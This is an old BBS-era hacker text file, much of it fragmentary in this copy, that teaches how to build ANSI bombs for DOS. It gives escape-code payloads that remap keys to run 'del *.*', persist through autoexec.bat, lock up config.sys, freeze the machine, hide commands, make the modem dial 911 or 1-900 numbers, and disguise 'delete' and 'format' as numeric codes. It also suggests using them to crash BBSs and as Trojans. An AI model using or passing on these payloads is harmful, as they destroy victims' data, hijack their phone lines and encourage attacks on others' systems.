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ombs II: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ging Go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riting the last file, a lot of people let me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 had made.  I guess this file is to clear up those mi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s and to let people know about some of the little trick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ing.  Of course, ANSI bombing isn't as dangerous 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ke it out to be, but bombs are still fun to mak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lanning deliver some degree of success.  ANSI bomb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ngerous, so I am tired of hearing people say that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nother misconception I hope to clear up.  Now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pent time experimenting with ANSI bombs probably kn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in this file, but it might be fun just to re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s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ast file, I made three major blunders, or what I woul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o be major blunders.  First, I said that ANSI bomb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BBSs to screw people over, but I guess I was wro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peculation on what other people had said that made me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, including those that redefine keys, are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most comm programs don't use ANSI.SYS; they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SI, which doesn't support key redefinition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program that supports it, but I haven't seen it y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bombs on systems on my own and proved to myself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I have also seen people fuck up bomb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y uploading them in a message.  The second miscon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SI bombs are dangerous when put into zips.  I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out much, but from what I hear with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you have to specify that you want to see ANSI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.  It is unlikely that you would waste your time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gain after seeing "Format C:" in the middle of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could be mistaken, but I'm pretty sure that I'm right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hat was a misconception is that VANSI.SYS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rom key redefinition.  Maybe the newer vers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y redefinition, but mine sure as hell does.  There a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out there that don't support it, but I don't know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Of course, if I were you, I would be wary about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ther then ANSI.  I have a few friends that are working o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SI" for PDers, which, instead of being better, really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n case you haven't read my other file (it's called ANSI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ame but fairly informative), I'll briefly go over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an ANSI bomb.  Skip this part if you know what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SI everything is done with a system of escape codes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is one of those codes.  (From now, whenever I say ES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 the arrow, ).  Here is a bas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[13;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make the &lt;Enter&gt; key (13 is the code for enter)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&lt;Escape&gt; key (27 is the code for escape).  The  alway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as do the bracket and the "p", but what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and the "p" is up to you.  The first number is alway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be redefined.  If there is a zero for the firs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that means the key is in the extended set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numbers are the code.  The bracket signifie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ition, and the "p" signifies the end.  Wheneve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, you have to use it's numerical code (i.e. 13 i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Enter&gt;).  You can't redefine strings, but you can redefin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tring (i.e. ESC [13;"Blah"p would make &lt;Enter&gt;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h").  Strings must be inside of quotes, which inclu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yped on the DOS prompt (i.e. ESC [13;"Del *.*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lete everything in the directory, note that 13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is case, not the redefinition).  An escape cod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mmands as you want in it, but each one has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mi-colon.  You can only redefine one key in each escap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redefine another key, you have to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.  That's about it when it comes to bombs,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asics, all you really need is a littl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Y/N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here's a simple but fun little ANSI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78;89;13p ESC [110;121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all this does is turn a capital "N" into "Y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"n" into "y".  Alone this doesn't do too much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around with what they are typing.  On the other hand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f code to the ANSI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13;27;13;"del *.*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would automatically press "N" when they see "Del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y do, they will be screwed over.  This portion of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it comes to making good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crewing with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other line of code that you may find useful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13;27;13;"copy bomb.ans c:\";13;"cop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autoexec.bat";13;"type bomb.ans";13;0;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;"cl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code makes the bomb a little more perman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angerous.  It copies the bomb in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hange/creates the autoexec.bat, so the bomb is ty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ot-up.  Of course, the person could just boot off a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would get them a few time.  It could al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ough it were a virus, scaring the shit out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urning Commands into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pranks to do to someone using an ANSI bo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ommands.  That way if they type in "copy", it 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*.*".  Since you can't actually change the whole str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different approach.  You have to change a few of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yped, they type and execute the desired command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olest to have to command exactly the same length;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define one key at a time to obtain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ally matter how you do it, just as long as it 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an ANSI that says "Wow, check out what this bomb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", and then have it redefine the keys, so when th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ir", it turns into "del".  I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overing Your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kind of useful, if you don't want the bomb to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been set off.  Here's the command you can sti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, so that it will delete itself.  This is also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to think they've been hit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delete bomb.an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make it look like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echo You've been hit by the Big B Virus";13;"delete bomb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is a little more fun, but they both ge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crewing with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py con c:\config.sys";13;"device=config.sys";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;64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ange the config.sys, so when they reboot or you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, the computer will just freeze, and they won't know what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.  The CONFIG.SYS will be caught in a loop, and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is by booting off a floppy.  Alone it works wel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also freeze there computer, so they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reez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a program with only � and � (ALT-250 and ALT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pad), then the computer will freeze and lock up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ne you can incorpo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py con blah.com";13;"��";13;0;64;13;"blah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the necessary program and then run it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forc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H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commands can serve two purposes.  First, they can f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ut, making them think they're computer has frozen (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.  Second, they can hide the commands of the ANSI bom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with longer ANSI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mmand &gt;nul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ke it so all of the commands are invisi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ay the error messages (This doesn't work too well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ands, so just use it alone as a single ANSI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prompt $e[0;30m";13;"cl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color of the text, so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ck ground.  Therefore, all other commands in the ANSI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dden, and the harm will be done before the victim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This is very helpful and highly recomm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ANSI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odem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re interesting things you can do with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mmands directly to the modem from the DOS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have to guess on which port their modem is (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1 or COM2, but to be safe you can do them both)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command, then we will talk about some of the fu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ECHO ATDT911&gt;COM1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uld call 911 through the COM1, but COM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y other com port, 911 can be replac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and ATDT can be replaced with any other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un comes in when you play around with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911, which is fairly nasty in its own right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D number or a 1-900 (especially those that charge a fla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or so, like the gambler's hotline type thing). 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erson feel like a fool, but you could also make them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orer.  When used in conjunction with the freez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robably won't have enough time to turn off the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roj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, everybody knows what a Trojan is. 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, but ANSI bombs can be used as Trojans and in Trojan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on crashing a board, but you're no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then make yourself an ANSI bomb.  Try to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the main files for running the BBS are sto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under the name BBS or the name of the software, lik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gard.  Then, make a bomb that either just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, or if you want the board to be down a long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one that formats the Hard Drive.  In this form ANSI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well planned out, can be easy to make Trojans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can used in Trojans.  This is probably stretch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say you wanted to write a Trojan that would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very time you typed a certain key, then you c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.  First make some batch and com/exe files that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ng programs like Norton and turn them off. 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to the root directory, along with you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config.sys, ANSI.sys, and whatever else.  (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ore realistic make the files Resource.00x to trick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copying, use the real name).  Then somehow loc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 a warm boot through some pd program, which is easily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When the computer loads back up, you can screw that sh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ANSI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The Average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the average Joe is not going to know what the hel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he sees all of the escape commands, if he looks at it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support ANSI.  He will however be supicious if he sees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".  There is is a way to get rid of this.  Instead of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a text statement, redefine it as a bunch of keys that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ETE" = 100;101;108;101;116;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E   L   E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" = 102;111;114;109;97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 O   R   M  A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you can make destructive commands look like jus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Very few people will scrutinize an ANSI enough befo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e the redefinition command.  This is very helpful and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 recommend you always t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seem to some people that ANSI bombs are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thers that they are stupid or lame.  Personall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are just plain old fun.  They're not too hard to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that you can do with them.  They are nowhere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as virii, so if you're looking for unstoppable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lsewhere, but they do serve their purpose. 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out there that help you program ANSI bomb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kind of take the fun out of them.  Probably, some da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quit making ANSI bombs and start looking more into virii an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.  But for now, ANSI bombs suit m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Key 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mall program, which I find very helpful. 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it tells you the numeric code for every key you type in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means that it is in the extended set and therefore uses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ends the program.  Unfortunately,  I can't take any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got it over the phone from Heavymetl, and i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brother.  So many thanks go out to Heavymetl and his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'll probably be a little pissed at me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y file.  It is in Pascal and can be compiled in mos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 = #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CH,'(Special) - ',ORD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CH,' - ',ORD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'q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metl for giving me ideas.  Weapons Master for helping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me input.  And everyone who has helped m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ach me for some reason, just keep your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on some of the nets.  I'm not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864-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ine                               Tom Joseph           408-747-0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